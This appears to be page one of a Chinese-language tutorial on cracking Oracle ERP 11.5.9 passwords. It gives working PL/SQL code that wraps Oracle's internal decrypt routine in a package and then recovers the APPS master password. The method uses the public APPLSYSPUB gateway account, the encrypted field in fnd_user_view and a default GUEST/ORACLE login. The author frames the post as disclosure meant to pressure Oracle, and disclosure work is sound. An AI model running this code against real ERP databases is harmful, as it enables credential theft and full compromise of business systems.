破解Oracle ERP 密码

破解Oracle ERP 密码

1.     写作目的   1

2.     利用Toad或其它pl/sql工具在Oracle ERPDatabase中建立Package,源码如下...1

(1).建立Package Header1

(2).建立Package Body. 1

3.     取得APPS密码的步骤   2

4.     通过任何一个User name/password取得APPS密码的方法   2

5.     通过FND_USER:ENCRYPTED_USER_PASSWORD取得明文密码的方法...3

6.     通过上面建立的Package取得所有Oracle ERPApplication User 密码的方法...3

7.     通过上面建立的Package取得所有Oracle ERPDatabase User密码的方法...3

8.     删除第一步建立的Package 3

9.     结论   3

10.   提高Oracle ERP的安全性   4

11.   此程序在Oracle ERP 11.5.9通过Toad测试通过.4 

1.     写作目的

在要不要写出来让大家知道这个问题上想了很久, 但一想到迟早密码破解的方法还是会被人知道的,与其让少部分人知道,还不如让大家都知道,事先好作防范.

公布密码破解方法的目的还是想让Oracle ERP做得更安全一点,让我们大家放心的去用,毕竟是几千万的东西,现在的安全性显然还达不到用户的要求. 想借大家的力量给Oracle施加一点压力,以将Oracle ERP的各个版本改得安全一点.

2.     利用Toad或其它pl/sql工具在OracleERP Database中建立Package,源码如下

(1).建立Package Header

1. CREATE OR REPLACE PACKAGE CrackPwd AUTHID CURRENT_USER  
2.   
3. AS  
4.   
5. FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2)  
6.   
7. RETURN VARCHAR2;  
8.   
9. END CrackPwd;  

(2).建立Package Bdy

1. CREATE OR REPLACE PACKAGE BODY CrackPwd  
2.   
3. AS  
4.   
5. FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2)  
6.   
7. RETURN VARCHAR2  
8.   
9. AS  
10.   
11. LANGUAGE JAVA  
12.   
13. NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';  
14.   
15. END CrackPwd;  
16.   
17. /  
18.    

3.     取得APPS密码的步骤

 假设现在什么Oracle erp权限都没有,怎么去知道oracle erp databaes的权限呢?我们知道Oracle erp提供了一个database的公用账户(gateway user),此账户拥有database的最小权限,这个公用账号是: APPLSYSPUB/PUB(oracle erp网页中或URL中都有公开此账户),虽然此账户没有什么权限,但却有FND_USER_VIEW的查询权限,通过这个view可以看到erp中所有的user和其ENCRYPED_FOUNDATION_PASSWORD字段,问题就出在这个view的ENCRYPED_FOUNDATION_PASSWORD字段上, ENCRYPED_FOUNDATION_PASSWORD这个字段是由APPS的密码和用户密码一起通过加密算法得出的结果, 因此只要知道Oracle ERP的解密算法就可以通过fnd_user中任何一个user的password反查apps的密码.,而要知道fnd_user中任何一个user的密码是太简单的事了,在erp安装时就预设了很多账户,这些账户的user name和password都是一样的,一般没有人去改这些账户的密码

4.     通过任何一个Username/password取得APPS密码的方法

1. SET SERVEROUTPUT ON  
2.   
3. DECLARE  
4.   
5. guestUserPwd VARCHAR2(200);  
6.   
7. guestUserName VARCHAR2(100);  
8.   
9. guestFndPwd VARCHAR2(100);  
10.   
11. guestEncFndPwd VARCHAR2(100);  
12.   
13. delim NUMBER;  
14.   
15. BEGIN  
16.   
17. guestUserPwd :='GUEST/ORACLE';--Can any user password   
18.   
19. IF guestUserPwd IS NULL THEN  
20.   
21. guestUserPwd := UPPER(fnd_profile.value('GUEST_USER_PWD'));  
22.   
23. END IF;  
24.   
25. delim := INSTR(guestUserPwd,'/');  
26.   
27. guestUserName := UPPER(SUBSTR(guestUserPwd,1,delim-1));  
28.   
29. SELECT encrypted_foundation_password INTO guestEncFndPwd  
30.   
31. FROM fnd_user_view  
32.   
33. WHERE user_name = guestUserName AND (start_date <= SYSDATE) AND  
34.   
35. (end_date IS NULL OR end_date > SYSDATE);  
36.   
37. guestFndPwd :=CrackPwd.getpwd(guestUserPwd,guestEncFndPwd);  
38.   
39. IF NOT (guestFndPwd IS NULL) THEN  
40.   
41. DBMS_OUTPUT.put_line(guestFndPwd);  
42.   
43. END IF;  
44.   
45. END;  

注: guestUserPwd :='GUEST/ORACLE';--Can any userpassword

上面这一行可以改成任何一个User的username/password,账号和密码之间用”/”隔开

以上程序可以用toad执行

1 2 下一页